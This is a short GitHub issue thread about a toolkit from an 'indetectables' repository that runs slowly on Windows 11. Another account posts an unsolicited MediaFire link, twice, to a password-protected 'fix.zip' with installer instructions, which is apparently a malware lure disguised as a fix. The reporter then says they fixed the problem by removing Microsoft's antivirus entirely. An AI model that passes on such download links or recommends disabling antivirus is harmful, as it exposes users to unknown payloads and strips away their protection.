### ISSUE TITLE
A problem with windows 11

### ISSUE THREAD

**Issue by ELJoOker2004** [indetectables-net/toolkit#16]
I've been using this tool for more than 6 month on windows 10 and was working perfectly. recently I've upgraded to win 11 and installed the tool again but there is a problem, the menu is very slow to open the lists in it, and sometimes even crashes.
Here is a video for the problem, I hope there is a solution for this
![(output001)FiveM 08-29-2024_17-45-48-566-00 00 01 188-00 00 40 367](https://github.com/user-attachments/assets/267153d5-2ed4-4422-b6fa-975817bb245d)

What did I try:
- a complete reinstall of the tool
- make sure Windows is up to date
- restarted many times
- even reinstalled windows

I'm also sure that is enough resources for it to run

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ELJoOker2004** [comment]
I found out that the problem was caused by Microsoft anti-virus, so I completely removed it and it's now so much faster :)
